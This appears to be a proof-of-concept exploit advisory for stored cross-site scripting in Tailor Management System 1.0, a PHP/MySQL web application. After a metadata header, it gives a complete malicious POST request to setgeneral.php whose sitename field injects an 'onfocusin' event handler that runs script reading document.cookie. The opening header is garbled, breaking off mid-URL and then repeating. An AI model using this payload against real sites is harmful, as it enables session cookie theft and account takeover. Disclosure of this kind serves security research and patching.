# Title: Tailor Management System 1.0 - Stored Cross-Site Scripting
# Exploit Author: Ahmed Abbas
# Date: 2020-08-09
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-m # Title: Tailor Management System 1.0 - Stored Cross-Site Scripting
# Exploit Author: Ahmed Abbas
# Date: 2020-08-09
# Vendor Homepage: https://www.sourcecodester.com/php/14378/tailor-management-system-php-mysql.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14378&title=Tailor+Management+System+in+PHP+MySQL
# Version: 1.0
# Tested On: Windows 10 Pro 1909 (x64_86) + XAMPP 3.2.4

# Malicious POST Request to http://TARGET
POST /tailor/setgeneral.php HTTP/1.1
Host: 192.168.152.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.152.1/tailor/setgeneral.php
Content-Type: application/x-www-form-urlencoded
Content-Length: 133
DNT: 1
Connection: close
Cookie: PHPSESSID=2blcdl295pe64o39eavobmmb0h
Upgrade-Insecure-Requests: 1

sitename=%22autofocus+onfocusin%3Dalert%28document.cookie%29+%22%22&mobile=6000000&email=test%40email.com&currency=as&sms=as